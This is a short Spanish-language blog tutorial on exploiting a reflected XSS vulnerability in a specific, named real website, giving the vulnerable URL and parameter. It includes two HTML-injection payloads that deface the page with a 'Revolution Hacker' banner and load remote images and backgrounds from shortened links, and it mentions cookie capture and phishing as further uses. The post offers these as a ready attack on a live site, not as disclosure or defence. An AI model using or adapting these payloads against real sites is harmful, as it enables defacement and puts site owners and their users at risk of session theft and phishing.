Bueno como ven hoy les mostrare como explotar una VULNERABILIDAD XSS aclarando esta es una manera muy sencilla.
algunos ya conoceran los que se puede hacer con estos bugs, pero lo que yo veo es que algunos administradores no estan consientes del potencial de destruccion de estos errores, en manos de alguna persona sin etica puede volverse un ataque muy destructivo.
XSS EXPLICACION:
El XSS es un ataque o vulnerabilidad con la que podemos explotar varios aspectos, capturar cookies, hacer phising, ingresar imagenes, etiquetas html o simplemente hacer un deface. En fin aveces se necesita mucho conocimiento para explotar esta vulnerabilidad.
Existen 2 metodos POST y GET:
GET: Envia por cabezeras los parametros con las variables
POST: Lo mismo que GET pero no se ve el envio de las variables a simple ojo se tiene que utilizar herramientas para analizar cabezeras.
Empezamos
informacion-mercados como veran contiene un archivo que estudios_mercado.asp que a su vez hace un llamado a una variable sector y esta contiene un String Manufacturas si cambiamos esa variable por otro valor en este caso REVOLUTION
http://www.ibce.org.bo/informacion-mercados/estudios_mercado.asp?sector=2&n=REVOLUTION
El Codigo Malicioso Para Test #1
<center><divid="example1"></div><p%20id="example2"><font%20face="Papyrus";%20color="red";%20size="8"><br>-=.The Revolution Hacker.=-</font></b></center>
El Codigo Malicioso Para Test #2
<center><divid="example1"></div><p id="example2"><font face="Papyrus"; color="red"; size="8"><br>-=.The Revolution Hacker.=-</font></b><h1>Saludos a todos mis Seguidores</H1><H1><marquee>Nick</marquee></H1><img src=http://goo.gl/XcFRo><style type="text/css">body {background: black url("http://goo.gl/wopVj");background-repeat: repeat;background-position: center;background-attachment: fixed;}</style></center>
OK ESTO FUE TODO UN TUTORIAL EASY Y SENCILLO SALUDOS!
No hay comentarios:
Publicar un comentario